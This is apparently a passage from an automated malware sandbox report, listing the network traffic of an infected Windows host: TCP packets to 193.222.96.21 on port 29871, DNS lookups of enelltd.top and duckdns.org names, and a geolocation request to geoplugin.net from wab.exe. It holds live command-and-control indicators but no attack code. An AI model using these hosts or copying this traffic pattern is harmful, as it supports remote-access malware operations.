May 2, 2024 19:02:43.329473972 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329492092 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329503059 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329559088 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329586029 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329600096 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329617023 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329642057 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329672098 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329710007 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329710960 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329732895 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329750061 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329756975 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329809904 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329843998 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329871893 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329883099 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329924107 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329926014 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329938889 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.329968929 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.329988003 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330008984 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330024958 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330033064 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330070972 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330085039 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330111980 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330147028 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330207109 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330224991 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330235004 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330236912 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330246925 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330249071 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330260992 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330270052 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330319881 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330332994 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330348969 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330364943 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330420017 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330449104 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330457926 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330480099 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330501080 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330509901 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330513000 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330528975 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330576897 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330590010 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330600977 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330620050 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330642939 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330657959 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330668926 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330681086 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330697060 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330719948 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330763102 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330774069 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.330790997 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.330813885 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.347618103 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.347640991 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.347745895 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.493577003 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493601084 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493613958 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493627071 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493644953 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493659973 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493673086 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.493705034 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.493712902 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493766069 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493788958 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493803024 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.493803978 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493817091 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493839979 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.493864059 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493880987 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493901014 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.493904114 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493928909 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.493963003 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.493968010 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494009972 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494029045 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494049072 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.494060040 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.494070053 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494148016 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494160891 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494179964 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494183064 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.494220972 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.494242907 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494256973 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494267941 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494290113 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494303942 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.494324923 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.494474888 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494936943 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.494975090 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.495712042 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.496332884 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.496382952 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.497001886 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.497623920 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.497926950 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.497968912 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.498267889 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.498424053 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.498435974 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.498451948 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.498464108 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.498467922 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.498486042 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.498497009 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.498608112 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.498784065 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.498827934 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499120951 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499134064 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499146938 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499159098 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499171019 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499171019 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499182940 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499193907 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499206066 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499209881 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499219894 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499224901 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499232054 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499238968 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499244928 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499255896 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499267101 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499272108 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499293089 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499298096 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499309063 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499322891 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499336958 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499340057 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499352932 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499361992 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499366045 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499377966 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499383926 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499389887 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499401093 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499418020 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499418974 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499429941 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499438047 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499442101 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499453068 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499464035 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499475002 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499475956 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499488115 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499500036 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499500036 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499512911 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499514103 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499524117 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499536991 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499537945 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499556065 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499562979 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499567986 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499577999 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499588966 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499594927 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499600887 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499610901 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499612093 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499623060 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499631882 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499636889 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499648094 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499659061 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499665022 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499670982 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499680042 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499682903 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499694109 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499705076 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499706030 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499716043 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499720097 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499727011 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499737978 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499752998 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499757051 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499764919 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499775887 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499779940 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499787092 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499798059 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499798059 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499810934 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499823093 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499826908 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499834061 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499845982 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499846935 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499856949 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499867916 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499870062 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499880075 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499891996 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499895096 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499902964 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499912977 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499914885 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499927998 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499938011 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499942064 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499949932 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499953985 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499963045 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499974966 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499986887 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.499994040 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.499998093 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500010014 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500020027 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.500025034 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500031948 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.500036955 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500047922 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500056028 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.500058889 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500070095 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500077963 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.500083923 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500097990 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500114918 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500121117 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.500127077 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500134945 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.500138998 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500150919 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500161886 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500164986 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.500173092 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500185966 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500193119 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.500199080 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500211954 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500220060 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.500222921 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500230074 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.500235081 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500246048 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500257015 CEST	29871	49742	193.222.96.21	192.168.2.4
May 2, 2024 19:02:43.500261068 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.500282049 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:43.540386915 CEST	49742	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:56.370438099 CEST	29871	49740	193.222.96.21	192.168.2.4
May 2, 2024 19:02:56.415405989 CEST	49740	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:56.734635115 CEST	49740	29871	192.168.2.4	193.222.96.21
May 2, 2024 19:02:56.969127893 CEST	29871	49740	193.222.96.21	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 2, 2024 19:01:50.752511024 CEST	60491	53	192.168.2.4	1.1.1.1
May 2, 2024 19:01:50.925055981 CEST	53	60491	1.1.1.1	192.168.2.4
May 2, 2024 19:01:56.561995029 CEST	59370	53	192.168.2.4	1.1.1.1
May 2, 2024 19:01:57.556396008 CEST	59370	53	192.168.2.4	1.1.1.1
May 2, 2024 19:01:58.584929943 CEST	59370	53	192.168.2.4	1.1.1.1
May 2, 2024 19:02:00.571760893 CEST	59370	53	192.168.2.4	1.1.1.1
May 2, 2024 19:02:00.654227018 CEST	53	59370	1.1.1.1	192.168.2.4
May 2, 2024 19:02:00.654247046 CEST	53	59370	1.1.1.1	192.168.2.4
May 2, 2024 19:02:00.654356003 CEST	53	59370	1.1.1.1	192.168.2.4
May 2, 2024 19:02:00.660341024 CEST	53	59370	1.1.1.1	192.168.2.4
May 2, 2024 19:02:00.662130117 CEST	62195	53	192.168.2.4	1.1.1.1
May 2, 2024 19:02:00.767519951 CEST	53	62195	1.1.1.1	192.168.2.4
May 2, 2024 19:02:01.776484966 CEST	55896	53	192.168.2.4	1.1.1.1
May 2, 2024 19:02:01.899205923 CEST	53	55896	1.1.1.1	192.168.2.4
May 2, 2024 19:02:36.704521894 CEST	54891	53	192.168.2.4	1.1.1.1
May 2, 2024 19:02:36.795912027 CEST	53	54891	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 2, 2024 19:01:50.752511024 CEST	192.168.2.4	1.1.1.1	0xfb5d	Standard query (0)	enelltd.top	A (IP address)	IN (0x0001)	false
May 2, 2024 19:01:56.561995029 CEST	192.168.2.4	1.1.1.1	0xc049	Standard query (0)	learfo55ozj02.duckdns.org	A (IP address)	IN (0x0001)	false
May 2, 2024 19:01:57.556396008 CEST	192.168.2.4	1.1.1.1	0xc049	Standard query (0)	learfo55ozj02.duckdns.org	A (IP address)	IN (0x0001)	false
May 2, 2024 19:01:58.584929943 CEST	192.168.2.4	1.1.1.1	0xc049	Standard query (0)	learfo55ozj02.duckdns.org	A (IP address)	IN (0x0001)	false
May 2, 2024 19:02:00.571760893 CEST	192.168.2.4	1.1.1.1	0xc049	Standard query (0)	learfo55ozj02.duckdns.org	A (IP address)	IN (0x0001)	false
May 2, 2024 19:02:00.662130117 CEST	192.168.2.4	1.1.1.1	0xb1f9	Standard query (0)	leirfo45ozj01.duckdns.org	A (IP address)	IN (0x0001)	false
May 2, 2024 19:02:01.776484966 CEST	192.168.2.4	1.1.1.1	0xe6a3	Standard query (0)	learfo55ozj02.duckdns.org	A (IP address)	IN (0x0001)	false
May 2, 2024 19:02:36.704521894 CEST	192.168.2.4	1.1.1.1	0xf643	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 2, 2024 19:01:50.925055981 CEST	1.1.1.1	192.168.2.4	0xfb5d	No error (0)	enelltd.top		104.21.45.139	A (IP address)	IN (0x0001)	false
May 2, 2024 19:01:50.925055981 CEST	1.1.1.1	192.168.2.4	0xfb5d	No error (0)	enelltd.top		172.67.215.46	A (IP address)	IN (0x0001)	false
May 2, 2024 19:02:00.654227018 CEST	1.1.1.1	192.168.2.4	0xc049	Server failure (2)	learfo55ozj02.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
May 2, 2024 19:02:00.654247046 CEST	1.1.1.1	192.168.2.4	0xc049	Server failure (2)	learfo55ozj02.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
May 2, 2024 19:02:00.654356003 CEST	1.1.1.1	192.168.2.4	0xc049	Server failure (2)	learfo55ozj02.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
May 2, 2024 19:02:00.660341024 CEST	1.1.1.1	192.168.2.4	0xc049	Server failure (2)	learfo55ozj02.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
May 2, 2024 19:02:00.767519951 CEST	1.1.1.1	192.168.2.4	0xb1f9	Name error (3)	leirfo45ozj01.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
May 2, 2024 19:02:01.899205923 CEST	1.1.1.1	192.168.2.4	0xe6a3	No error (0)	learfo55ozj02.duckdns.org		193.222.96.21	A (IP address)	IN (0x0001)	false
May 2, 2024 19:02:36.795912027 CEST	1.1.1.1	192.168.2.4	0xf643	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

enelltd.top

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	178.237.33.50	80	7188	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 19:02:36.965058088 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
May 2, 2024 19:02:37.136698961 CEST	1173	IN	HTTP/1.1 200 OK date: Thu, 02 May 2024 17:02:37 GMT server: Apache content-length: 965 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 